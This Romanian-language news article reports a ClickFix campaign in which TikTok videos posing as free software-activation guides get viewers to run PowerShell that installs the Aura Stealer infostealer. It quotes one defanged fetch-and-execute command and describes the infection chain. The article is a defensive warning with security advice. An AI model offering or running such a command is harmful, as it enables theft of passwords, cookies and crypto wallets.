O campanie recentă de atacuri informatice utilizează videoclipuri pe TikTok pentru a răspândi malware de tip „infostealer”, sub pretextul oferirii unor ghiduri gratuite de activare pentru programe populare precum Windows, Microsoft 365, Adobe Premiere, Photoshop sau Spotify Premium.
Specialiștii în securitate cibernetică avertizează că acest tip de atac, cunoscut sub denumirea de ClickFix, câștigă rapid teren printre infractorii digitali care operează pe TikTok, conform Playtech.
Xavier Mertens, specialist la ISC Handler, a observat că această campanie revine la o metodă documentată de Trend Micro încă din luna mai, potrivit Bleeping Computer.
Videoclipurile par să ofere instrucțiuni legitime de activare software, dar îi determină pe utilizatori să execute comenzi PowerShell periculoase, care permit infectarea sistemului cu programe malițioase.
Cum funcționează atacurile ClickFix pe TikTok
Fiecare clip afișează o comandă simplă, aparent inofensivă, și îi îndeamnă pe spectatori să o ruleze ca administrator în PowerShell, de exemplu: iex (irm slmgr[.]win/photoshop).
Adresele URL diferă în funcție de programul pe care încearcă să îl imite (de exemplu, „photoshop” este înlocuit cu „windows” în clipurile care pretind activarea Windows).
Odată ce comanda este rulată, aceasta stabilește o conexiune cu site-ul compromis slmgr[.]win, de unde descarcă și rulează un alt script PowerShell.
Acest script, la rândul său, preia două fișiere executabile găzduite pe pagini controlate:
Primul fișier —
updater.exe— este o variantă a malware-ului Aura Stealer, cunoscut pentru capacitatea sa de a colecta parole salvate în browsere, cookie-uri de autentificare, portofele de criptomonede și acreditări din diferite aplicații. Aceste informații sunt trimise către serverele infractorilor.Al doilea fișier —
source.exe— descarcă și compilează cod în memorie folosind compilatorul C# integrat în .NET (csc.exe); scopul final al acestei operațiuni rămâne necunoscut.
Riscuri majore și recomandări de securitate
Utilizatorii care au rulat aceste comenzi ar trebui să considere că toate datele de autentificare au fost compromise. Experții recomandă schimbarea imediată a parolelor pentru toate conturile online și activarea autentificării în doi pași acolo unde este posibil.
Atacurile ClickFix au crescut în frecvență în ultimul an, fiind folosite pentru distribuirea unor familii variate de malware, inclusiv în campanii de ransomware și furt de criptomonede.
Pentru a evita compromiterea sistemului, specialiștii avertizează „nu copiați niciodată text sau comenzi dintr-un videoclip ori site web pentru a le rula direct” — fie în PowerShell, Command Prompt, File Explorer, terminalul macOS sau shell-urile Linux. Indiferent de cât de convingătoare pare sursa, un singur click greșit poate deschide sistemul tău unei breșe de securitate.
Comentează